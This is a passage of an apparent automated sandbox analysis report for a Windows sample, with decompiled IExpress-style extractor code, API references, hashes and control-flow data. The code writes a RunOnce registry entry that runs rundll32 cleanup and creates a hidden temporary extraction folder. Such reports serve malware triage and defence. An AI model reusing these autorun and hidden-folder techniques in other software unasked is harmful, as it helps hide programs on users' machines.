                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				void* _v532;
                                                                                                                                                                                                                                            				int _v536;
                                                                                                                                                                                                                                            				int _v540;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				void _t56;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t72;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				intOrPtr* _t81;
                                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t79 = __edx;
                                                                                                                                                                                                                                            				_t28 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                            				_t84 = 0x104;
                                                                                                                                                                                                                                            				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                            				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                            				_t66 = 0;
                                                                                                                                                                                                                                            				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					L24:
                                                                                                                                                                                                                                            					return E00326CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(_t86);
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E0032171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                            					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                            					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                            					if(_t41 != 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t87 = _t87 + 1;
                                                                                                                                                                                                                                            					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                            					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                            					_t79 = _t84;
                                                                                                                                                                                                                                            					E0032658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                            					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                            					_t84 = _t46;
                                                                                                                                                                                                                                            					if(_t84 == 0) {
                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0x329a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            							L17:
                                                                                                                                                                                                                                            							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							_pop(_t86);
                                                                                                                                                                                                                                            							goto L24;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						_t72 =  &_v268;
                                                                                                                                                                                                                                            						_t80 = _t72 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t49 =  *_t72;
                                                                                                                                                                                                                                            							_t72 = _t72 + 1;
                                                                                                                                                                                                                                            						} while (_t49 != 0);
                                                                                                                                                                                                                                            						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                            						_t81 = 0x3291e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t50 =  *_t81;
                                                                                                                                                                                                                                            							_t81 = _t81 + 1;
                                                                                                                                                                                                                                            						} while (_t50 != 0);
                                                                                                                                                                                                                                            						_t84 = _t73 + 0x50 + _t81 - 0x3291e5;
                                                                                                                                                                                                                                            						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x3291e5);
			if(_t90 != 0) {
				 *0x328580 = _t66 ^ 0x00000001;
				_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
				if(_t66 == 0) {
					_t54 = "%s /D:%s";
				}
				_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
				E0032171E(_t90, _t84, _t54,  &_v268);
				_t75 = _t90;
				_t23 = _t75 + 1; // 0x1
				_t79 = _t23;
				do {
					_t56 =  *_t75;
					_t75 = _t75 + 1;
				} while (_t56 != 0);
				_t24 = _t75 - _t79 + 1; // 0x2
				RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
				RegCloseKey(_v532); // executed
				_t36 = LocalFree(_t90);
				goto L23;
			}
			_t79 = 0x4b5;
			E003244B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
			goto L17;
		}
		_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
		_t66 = 0 | _t91 != 0x00000000;
		FreeLibrary(_t84); // executed
		if(_t91 == 0) {
			goto L10;
		}
		if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
			E0032658A( &_v268, 0x104, 0x321140);
		}
		goto L11;
	}
	_t36 = RegCloseKey(_v532);
	 *0x328530 = _t66;
	goto L23;
}


































                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00322050
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0032205F
                                                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0032208C
                                                                                                                                                                                                                                              • Part of subcall function 0032171E: _vsnprintf.MSVCRT ref: 00321750
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003220C9
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003220EA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00322103
                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00322122
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00322134
                                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00322144
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 0032215B
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0032218C
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003221C1
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003221E4
                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0032223D
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00322249
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00322250
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                            • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                                                                                                                                                                                            • API String ID: 178549006-850274211
                                                                                                                                                                                                                                            • Opcode ID: 616e2d9b7a85b457e591f54584e91647883feb7ab18592a5ec689011f75906b1
                                                                                                                                                                                                                                            • Instruction ID: 696330c0c9ca48dda9dd37b199e190cc26ad47cc8291104e8ef98e9d91ddd2b1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 616e2d9b7a85b457e591f54584e91647883feb7ab18592a5ec689011f75906b1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6851E671A00234BBDB339B64EC49FEB776CEF55700F1081A8FA49E6151DA719D4A8A50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 232 3255a0-3255d9 call 32468f LocalAlloc 235 3255db-3255f1 call 3244b9 call 326285 232->235 236 3255fd-32560c call 32468f 232->236 250 3255f6-3255f8 235->250 242 325632-325643 lstrcmpA 236->242 243 32560e-325630 call 3244b9 LocalFree 236->243 246 325645 242->246 247 32564b-325659 LocalFree 242->247 243->250 246->247 248 325696-32569c 247->248 249 32565b-32565d 247->249 255 3256a2-3256a8 248->255 256 32589f-3258b5 call 326517 248->256 252 325669 249->252 253 32565f-325667 249->253 254 3258b7-3258c7 call 326ce0 250->254 257 32566b-32567a call 325467 252->257 253->252 253->257 255->256 260 3256ae-3256c1 GetTempPathA 255->260 256->254 269 325680-325691 call 3244b9 257->269 270 32589b-32589d 257->270 264 3256f3-325711 call 321781 260->264 265 3256c3-3256c9 call 325467 260->265 274 325717-325729 GetDriveTypeA 264->274 275 32586c-325890 GetWindowsDirectoryA call 32597d 264->275 272 3256ce-3256d0 265->272 269->250 270->254 272->270 276 3256d6-3256df call 322630 272->276 280 325730-325740 GetFileAttributesA 274->280 281 32572b-32572e 274->281 275->264 286 325896 275->286 276->264 287 3256e1-3256ed call 325467 276->287 284 325742-325745 280->284 285 32577e-32578f call 32597d 280->285 281->280 281->284 289 325747-32574f 284->289 290 32576b 284->290 297 3257b2-3257bf call 322630 285->297 298 325791-32579e call 322630 285->298 286->270 287->264 287->270 292 325771-325779 289->292 294 325751-325753 289->294 290->292 296 325864-325866 292->296 294->292 299 325755-325762 call 326952 294->299 296->274 296->275 306 3257d3-3257f8 call 32658a GetFileAttributesA 297->306 307 3257c1-3257cd GetWindowsDirectoryA 297->307 298->290 309 3257a0-3257b0 call 32597d 298->309 299->290 308 325764-325769 299->308 314 32580a 306->314 315 
3257fa-325808 CreateDirectoryA 306->315 307->306 308->285 308->290 309->290 309->297 316 32580d-32580f 314->316 315->316 317 325811-325825 316->317 318 325827-32585c SetFileAttributesA call 321781 call 325467 316->318 317->296 318->270 323 32585e 318->323 323->296
                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E003255A0(void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v265;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				int _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t35;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				int _t40;
                                                                                                                                                                                                                                            				int _t44;
                                                                                                                                                                                                                                            				long _t48;
                                                                                                                                                                                                                                            				int _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				int _t54;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				char _t60;
                                                                                                                                                                                                                                            				int _t65;
                                                                                                                                                                                                                                            				char _t66;
                                                                                                                                                                                                                                            				int _t67;
                                                                                                                                                                                                                                            				int _t68;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				int _t70;
                                                                                                                                                                                                                                            				int _t71;
                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                            				int _t73;
                                                                                                                                                                                                                                            				CHAR* _t82;
                                                                                                                                                                                                                                            				CHAR* _t88;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                            				_t2 = E0032468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                            				if(_t109 != 0) {
                                                                                                                                                                                                                                            					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                            					_t32 = E0032468F(_t82, _t109, 1);
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                            						__eflags = _t33;
                                                                                                                                                                                                                                            						if(_t33 == 0) {
                                                                                                                                                                                                                                            							 *0x329a30 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						_t35 =  *0x328b3e; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t35;
                                                                                                                                                                                                                                            						if(_t35 == 0) {
                                                                                                                                                                                                                                            							__eflags =  *0x328a24; // 0x0
                                                                                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                                                                                            								L46:
                                                                                                                                                                                                                                            								_t101 = 0x7d2;
                                                                                                                                                                                                                                            								_t36 = E00326517(_t82, 0x7d2, 0, E00323210, 0, 0);
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0x329a30; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L46;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t109 = 0x3291e4;
                                                                                                                                                                                                                                            									_t40 = GetTempPathA(0x104, 0x3291e4);
                                                                                                                                                                                                                                            									__eflags = _t40;
                                                                                                                                                                                                                                            									if(_t40 == 0) {
                                                                                                                                                                                                                                            										L19:
                                                                                                                                                                                                                                            										_push(_t82);
                                                                                                                                                                                                                                            										E00321781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                            										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                            										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                            											do {
                                                                                                                                                                                                                                            												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                            												__eflags = _t109 - 6;
                                                                                                                                                                                                                                            												if(_t109 == 6) {
                                                                                                                                                                                                                                            													L22:
                                                                                                                                                                                                                                            													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                            													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L23;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													__eflags = _t109 - 3;
                                                                                                                                                                                                                                            													if(_t109 != 3) {
                                                                                                                                                                                                                                            														L23:
                                                                                                                                                                                                                                            														__eflags = _t109 - 2;
                                                                                                                                                                                                                                            														if(_t109 != 2) {
                                                                                                                                                                                                                                            															L28:
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															goto L29;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                            															if(_t66 == 0x41) {
                                                                                                                                                                                                                                            																L29:
                                                                                                                                                                                                                                            																_t60 = _t66 + 1;
                                                                                                                                                                                                                                            																_v268 = _t60;
                                                                                                                                                                                                                                            																goto L42;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                            																if(_t66 == 0x42) {
                                                                                                                                                                                                                                            																	goto L29;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t68 = E00326952( &_v268);
                                                                                                                                                                                                                                            																	__eflags = _t68;
                                                                                                                                                                                                                                            																	if(_t68 == 0) {
                                                                                                                                                                                                                                            																		goto L28;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                            																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                            																			L30:
                                                                                                                                                                                                                                            																			_push(0);
                                                                                                                                                                                                                                            																			_t103 = 3;
                                                                                                                                                                                                                                            																			_t49 = E0032597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                            																			__eflags = _t49;
                                                                                                                                                                                                                                            																			if(_t49 != 0) {
                                                                                                                                                                                                                                            																				L33:
                                                                                                                                                                                                                                            																				_t50 = E00322630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t50;
                                                                                                                                                                                                                                            																				if(_t50 != 0) {
                                                                                                                                                                                                                                            																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t88 =  &_v268;
                                                                                                                                                                                                                                            																				E0032658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                            																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                            																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                            																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                            																					__eflags = _t54;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				__eflags = _t54;
                                                                                                                                                                                                                                            																				if(_t54 != 0) {
                                                                                                                                                                                                                                            																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                            																					_push(_t88);
                                                                                                                                                                                                                                            																					_t109 = 0x3291e4;
                                                                                                                                                                                                                                            																					E00321781(0x3291e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                            																					_t101 = 1;
                                                                                                                                                                                                                                            																					_t59 = E00325467(0x3291e4, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t59;
                                                                                                                                                                                                                                            																					if(_t59 != 0) {
                                                                                                                                                                                                                                            																						goto L45;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t60 = _v268;
                                                                                                                                                                                                                                            																						goto L42;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                            																					_v265 = 0;
                                                                                                                                                                                                                                            																					_v268 = _t60;
                                                                                                                                                                                                                                            																					goto L42;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				_t65 = E00322630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t65;
                                                                                                                                                                                                                                            																				if(_t65 != 0) {
                                                                                                                                                                                                                                            																					goto L28;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t67 = E0032597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t67;
                                                                                                                                                                                                                                            																					if(_t67 == 0) {
                                                                                                                                                                                                                                            																						goto L28;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						goto L33;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			goto L28;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L22;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L47;
                                                                                                                                                                                                                                            												L42:
                                                                                                                                                                                                                                            												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                            											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										goto L43;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t101 = 1;
                                                                                                                                                                                                                                            										_t69 = E00325467(0x3291e4, 1, 3); // executed
                                                                                                                                                                                                                                            										__eflags = _t69;
                                                                                                                                                                                                                                            										if(_t69 != 0) {
                                                                                                                                                                                                                                            											goto L45;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t82 = 0x3291e4;
                                                                                                                                                                                                                                            											_t70 = E00322630(0, 0x3291e4, 1);
                                                                                                                                                                                                                                            											__eflags = _t70;
                                                                                                                                                                                                                                            											if(_t70 != 0) {
                                                                                                                                                                                                                                            												goto L19;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t101 = 1;
                                                                                                                                                                                                                                            												_t82 = 0x3291e4;
                                                                                                                                                                                                                                            												_t71 = E00325467(0x3291e4, 1, 1);
                                                                                                                                                                                                                                            												__eflags = _t71;
                                                                                                                                                                                                                                            												if(_t71 != 0) {
                                                                                                                                                                                                                                            													goto L45;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													do {
                                                                                                                                                                                                                                            														goto L19;
                                                                                                                                                                                                                                            														L43:
                                                                                                                                                                                                                                            														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            														_push(4);
                                                                                                                                                                                                                                            														_t101 = 3;
                                                                                                                                                                                                                                            														_t82 =  &_v268;
                                                                                                                                                                                                                                            														_t44 = E0032597D(_t82, _t101, 1);
                                                                                                                                                                                                                                            														__eflags = _t44;
                                                                                                                                                                                                                                            													} while (_t44 != 0);
                                                                                                                                                                                                                                            													goto L2;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                            							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								_t72 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0x328b3f - _t35; // 0x0
                                                                                                                                                                                                                                            								_t72 = 0;
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L10;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t101 = 0;
                                                                                                                                                                                                                                            							_t73 = E00325467(0x328b3e, 0, _t72);
                                                                                                                                                                                                                                            							__eflags = _t73;
                                                                                                                                                                                                                                            							if(_t73 != 0) {
                                                                                                                                                                                                                                            								L45:
                                                                                                                                                                                                                                            								_t38 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t101 = 0x4be;
                                                                                                                                                                                                                                            								E003244B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L2;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t101 = 0x4b1;
                                                                                                                                                                                                                                            						E003244B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						 *0x329124 = 0x80070714;
                                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t101 = 0x4b5;
                                                                                                                                                                                                                                            					E003244B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0x329124 = E00326285();
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					_t38 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L47:
                                                                                                                                                                                                                                            				return E00326CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x0032572b
                                                                                                                                                                                                                                            0x0032572e
                                                                                                                                                                                                                                            0x00325742
                                                                                                                                                                                                                                            0x00325742
                                                                                                                                                                                                                                            0x00325745
                                                                                                                                                                                                                                            0x0032576b
                                                                                                                                                                                                                                            0x0032576b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325747
                                                                                                                                                                                                                                            0x00325747
                                                                                                                                                                                                                                            0x0032574d
                                                                                                                                                                                                                                            0x0032574f
                                                                                                                                                                                                                                            0x00325771
                                                                                                                                                                                                                                            0x00325771
                                                                                                                                                                                                                                            0x00325773
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325751
                                                                                                                                                                                                                                            0x00325751
                                                                                                                                                                                                                                            0x00325753
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325755
                                                                                                                                                                                                                                            0x0032575b
                                                                                                                                                                                                                                            0x00325760
                                                                                                                                                                                                                                            0x00325762
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325764
                                                                                                                                                                                                                                            0x00325764
                                                                                                                                                                                                                                            0x00325769
                                                                                                                                                                                                                                            0x0032577e
                                                                                                                                                                                                                                            0x0032577e
                                                                                                                                                                                                                                            0x00325781
                                                                                                                                                                                                                                            0x00325788
                                                                                                                                                                                                                                            0x0032578d
                                                                                                                                                                                                                                            0x0032578f
                                                                                                                                                                                                                                            0x003257b2
                                                                                                                                                                                                                                            0x003257b8
                                                                                                                                                                                                                                            0x003257bd
                                                                                                                                                                                                                                            0x003257bf
                                                                                                                                                                                                                                            0x003257cd
                                                                                                                                                                                                                                            0x003257cd
                                                                                                                                                                                                                                            0x003257dd
                                                                                                                                                                                                                                            0x003257e3
                                                                                                                                                                                                                                            0x003257ef
                                                                                                                                                                                                                                            0x003257f5
                                                                                                                                                                                                                                            0x003257f8
                                                                                                                                                                                                                                            0x0032580a
                                                                                                                                                                                                                                            0x0032580a
                                                                                                                                                                                                                                            0x003257fa
                                                                                                                                                                                                                                            0x00325802
                                                                                                                                                                                                                                            0x00325802
                                                                                                                                                                                                                                            0x0032580d
                                                                                                                                                                                                                                            0x0032580f
                                                                                                                                                                                                                                            0x00325830
                                                                                                                                                                                                                                            0x00325836
                                                                                                                                                                                                                                            0x0032583d
                                                                                                                                                                                                                                            0x0032584b
                                                                                                                                                                                                                                            0x00325851
                                                                                                                                                                                                                                            0x00325855
                                                                                                                                                                                                                                            0x0032585a
                                                                                                                                                                                                                                            0x0032585c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032585e
                                                                                                                                                                                                                                            0x0032585e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032585e
